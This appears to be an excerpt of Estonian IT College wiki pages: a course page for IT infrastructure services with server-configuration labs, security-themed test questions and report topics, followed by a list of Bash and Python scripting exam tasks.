Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-18T07:42:04Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-05-12T07:48:42Z

Mernits: /* BASH kontrolltöö 12. mai 2015.a. */

==BASH kontrolltöö 12. mai 2015.a.==

Loo skript, mis saab käsurealt kolm parameetrit. 1. kasutajanimi 2. Väljundfail 3. kataloog

* Skript kontrollib, et kasutajanimi on olemas. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõikide failide nimekirja, kuhu esimese parameetrina antud kasutaja saab kirjutada ja mis asuvad kolmanda parameetrina antud kataloogis või selle alamkataloogides.

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
/sedapoleolemas
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Kui faili/kataloogi ei ole, siis kirjutab (not found). Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
/sedapoleolemas,not found
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
